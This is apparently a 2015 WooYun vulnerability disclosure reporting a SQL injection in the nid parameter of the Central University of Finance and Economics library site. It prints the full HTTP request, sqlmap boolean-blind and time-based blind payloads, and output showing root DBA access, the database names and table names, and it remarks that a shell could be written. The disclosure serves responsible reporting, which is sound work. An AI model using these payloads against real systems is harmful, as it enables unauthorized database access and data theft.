当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157193

漏洞标题:中央财经大学图图书馆SQL注入(DBA权限)

相关厂商:中央财经大学

漏洞作者: 路人甲

提交时间:2015-12-01 10:42

修复时间:2016-01-16 14:40

公开时间:2016-01-16 14:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

RT

详细说明:

GET /do/get_db.php?nid=3&page=1&type=fid&id_sort=13&rows=20&c=&d=&div=content&0.3172887838445604&0.3588008456863463&c=&d=&div=content&id_sort=A&nid=3*&page=1&rows=20&type=zm HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://lib.cufe.edu.cn
Cookie: cufeUSR2=cccjjtxv%090%091448790599%09http%3A%2F%2Flib.cufe.edu.cn%2Fdo%2Fget_db.php%3Fnid%3D3%26page%3D1%26type%3Dfid%26id_sort%3D13%26rows%3D20%26c%3D%26d%3D%26div%3Dcontent%260.3172887838445604; star_time=1448790311; cufestat_client_1=790947%0929%0934fe41959c661d5d3e5c5a70d52806c1; cufestat_client_uv_1=29; CNZZDATA1253322731=1532733387-1448790319-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1448790319; cod=; csd=169
Host: lib.cufe.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


nid参数存在注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://lib.cufe.edu.cn:80/do/get_db.php?nid=3&page=1&type=fid&id_sort=13&rows=20&c=&d=&div=content&0.3172887838445604&0.3588008456863463&c=&d=&div=content&id_sort=A&nid=3 AND 4748=4748&page=1&rows=20&type=zm
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://lib.cufe.edu.cn:80/do/get_db.php?nid=3&page=1&type=fid&id_sort=13&rows=20&c=&d=&div=content&0.3172887838445604&0.3588008456863463&c=&d=&div=content&id_sort=A&nid=3 AND (SELECT * FROM (SELECT(SLEEP(5)))YWYM)&page=1&rows=20&type=zm
---
web application technology: PHP 5.6.8, Apache 2.4.12
back-end DBMS: MySQL 5.0.12
current user:    'root@localhost'
current database:    'cufe'
current user is DBA:    True
available databases [4]:
[*] cufe
[*] information_schema
[*] mysql
[*] test


[22:18:42] [INFO] fetching tables for database: 'cufe'
[22:18:42] [INFO] fetching number of tables for database 'cufe'
[22:18:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:18:42] [INFO] retrieved: 58
[22:18:57] [INFO] retrieved: ice_admin_menu
[22:21:23] [INFO] retrieved: ice_area
[22:22:08] [INFO] retrieved: ice_article
[22:23:15] [INFO] retrieved: ice_article_db
[22:24:08] [INFO] retrieved: ice_ask_cache
[22:25:41] [INFO] retrieved: ice_ask_config
[22:26:51] [INFO] retrieved: ice_ask_form
[22:27:51] [INFO] retrieved: ice_ask_form_element
[22:29:32] [INFO] retrieved: ice_ask_sor
[22:30:53] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
t
[22:31:27] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[22:31:36] [INFO] retrieved: ice_ask_student
[22:32:57] [INFO] retrieved: ice_ask_student


DBA权限,mysql的,被写shell就不好了.

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-02 14:38

厂商回复:

超级用户的数据问题

最新状态:

暂无

漏洞评价:

评价